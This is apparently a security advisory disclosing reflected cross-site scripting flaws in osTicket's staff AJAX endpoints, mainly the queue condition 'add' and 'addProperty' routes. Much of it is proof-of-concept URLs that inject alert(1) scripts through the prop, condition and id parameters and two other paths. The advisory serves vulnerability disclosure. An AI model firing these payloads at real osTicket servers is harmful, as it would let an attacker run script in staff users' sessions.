Cross-Site Scripting (XSS) vulnerabilities arise when data is copied from a request and echoed into the application’s immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user’s browser in the context of that user’s session with the application.
In this specific case, following agent authentication and regardless of administrative privileges, an attacker might take advantage of the Queue Condition functionality widely used within the web application in multiple instances, invoking add
and addProperty
to execute client-side malicious javascript code by exploiting the unsanitized vulnerable GET parameters prop
, condition
and id
.
Later were found and included also further URL-based XSS vulnerabilities affecting scp/ajax.php
in staff/change-department
and kb/faq/1/access
.
prop
GET parameter in /addProperty
):http://<TARGET>/osTicket/scp/ajax.php/queue/condition/addProperty?prop=background-colorvximw%22%3e%3cscript%3ealert(1)%3c%2fscript%3edhvmt&condition=1001
condition
GET parameter in /addProperty
):http://<TARGET>/osTicket/scp/ajax.php/queue/condition/addProperty?prop=color&condition=1001ljos2%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Emui2bt(1)%3C%2fscript%3Edhvmt
id
GET parameter in /add
):http://<TARGET>/osTicket/scp/ajax.php/queue/condition/add?field=isassigned&object_id=9&id=1001lr5is%22%3e%3cscript%3ealert(1)%3c%2fscript%3euoq07
osTicket/scp/ajax.php/staff/change-department
):http://<TARGET>/osTicket/scp/ajax.php/staff/change-departmenthpwc8%22%3e%3cscript%3ealert(1)%3c/script%3em7dak
osTicket/scp/ajax.php/kb/faq/1/access
):http://<TARGET>/osTicket/scp/ajax.php/kb/faq/1/accessmztvw%22%3e%3cscript%3ealert(1)%3c/script%3ez2p1d